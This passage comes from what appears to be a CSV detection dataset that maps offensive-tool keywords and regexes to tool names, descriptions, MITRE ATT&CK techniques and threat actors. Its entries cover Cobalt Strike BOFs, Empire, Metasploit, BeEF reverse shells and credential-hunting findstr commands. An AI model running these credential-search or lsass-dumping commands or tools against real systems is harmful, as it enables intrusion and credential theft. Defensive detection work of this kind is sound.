- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*FindProcHandle *lsass*",".{0,1000}FindProcHandle\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*Find-ProtectionSoftware*",".{0,1000}Find\-ProtectionSoftware.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Find-PSScriptsInPSAppLog*",".{0,1000}Find\-PSScriptsInPSAppLog.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-PSServiceAccounts.ps1*",".{0,1000}Find\-PSServiceAccounts\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Find-RDPClientConnections*",".{0,1000}Find\-RDPClientConnections.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-Secret -FilePath ./logs.txt -Regex *",".{0,1000}Find\-Secret\s\-FilePath\s\.\/logs\.txt\s\-Regex\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*FindSMB2UPTime.py*",".{0,1000}FindSMB2UPTime\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Findsploit*",".{0,1000}Findsploit.{0,1000}","offensive_tool_keyword","Findsploit","Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c)","T1210 - T1105 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/Findsploit","1","1","N/A","N/A","10","1549","319","2021-09-27T01:43:24Z","2015-03-16T16:15:55Z" "*findstr *BEGIN CERTIFICATE*",".{0,1000}findstr\s.{0,1000}BEGIN\sCERTIFICATE.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *confidential*",".{0,1000}findstr\s.{0,1000}confidential.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *net use*",".{0,1000}findstr\s.{0,1000}net\suse.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *password*",".{0,1000}findstr\s.{0,1000}password.{0,1000}","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr lsass*",".{0,1000}findstr\slsass.{0,1000}","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*findstr.exe Tvndrgaaa*",".{0,1000}findstr\.exe\sTvndrgaaa.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Findsubdomains*",".{0,1000}Findsubdomains.{0,1000}","offensive_tool_keyword","findsubdomains","A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.","T1590 - T1591 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Information Gathering","https://findsubdomains.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-TrustedDocuments*",".{0,1000}Find\-TrustedDocuments.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-TrustedDocuments.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-TrustedDocuments.ps1*",".{0,1000}Find\-TrustedDocuments\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*FindUncommonShares.git*",".{0,1000}FindUncommonShares\.git.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","371","43","2024-04-23T15:42:03Z","2021-10-06T12:30:16Z" "*FindUncommonShares.p*",".{0,1000}FindUncommonShares\.p.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*FindUncommonShares.py *",".{0,1000}FindUncommonShares\.py\s.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","371","43","2024-04-23T15:42:03Z","2021-10-06T12:30:16Z" "*FindUncommonShares-main*",".{0,1000}FindUncommonShares\-main.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","371","43","2024-04-23T15:42:03Z","2021-10-06T12:30:16Z" "*finduncshar_scan*",".{0,1000}finduncshar_scan.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Find-UnsafeLogonScriptPermissions.ps1*",".{0,1000}Find\-UnsafeLogonScriptPermissions\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Find-UnsafeUNCPermissions -UNCScripts*",".{0,1000}Find\-UnsafeUNCPermissions\s\-UNCScripts.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Find-UnsafeUNCPermissions.ps1*",".{0,1000}Find\-UnsafeUNCPermissions\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Find-UserField -SearchField *",".{0,1000}Find\-UserField\s\-SearchField\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-VacantComputer*",".{0,1000}Find\-VacantComputer.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Find-WMILocalAdminAccess*",".{0,1000}Find\-WMILocalAdminAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Finish moonwalk and clear your traces*",".{0,1000}Finish\smoonwalk\sand\sclear\syour\straces.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*fir3d0g/mimidogz*",".{0,1000}fir3d0g\/mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*FireBuster.ps1*",".{0,1000}FireBuster\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*fireeye*commando*",".{0,1000}fireeye.{0,1000}commando.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*FireFart*dirtycow*",".{0,1000}FireFart.{0,1000}dirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","1","N/A","N/A","9","817","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" "*firefox/FakeUpdate_files/*",".{0,1000}firefox\/FakeUpdate_files\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*firefox_decrypt.py*",".{0,1000}firefox_decrypt\.py.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1811","293","2024-04-07T20:04:37Z","2014-01-17T13:25:02Z" "*firefox_decrypt-main*",".{0,1000}firefox_decrypt\-main.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1811","293","2024-04-07T20:04:37Z","2014-01-17T13:25:02Z" "*firefox_extension_bindshell*",".{0,1000}firefox_extension_bindshell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*firefox_extension_reverse_shell*",".{0,1000}firefox_extension_reverse_shell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*firefox_privilege_escalation.rb*",".{0,1000}firefox_privilege_escalation\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*firefox_privilege_escalation_spec.rb*",".{0,1000}firefox_privilege_escalation_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*firefox_smil_uaf*",".{0,1000}firefox_smil_uaf.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*FireListener.ps1*",".{0,1000}FireListener\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Firesheep/*",".{0,1000}Firesheep\/.{0,1000}","offensive_tool_keyword","firesheep","Free program for HTTP session hijacking attacks.","T1550 - T1555 - T1559 - T1565","TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://codebutler.github.io/firesheep/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Firewall_Walker_BOF*",".{0,1000}Firewall_Walker_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with 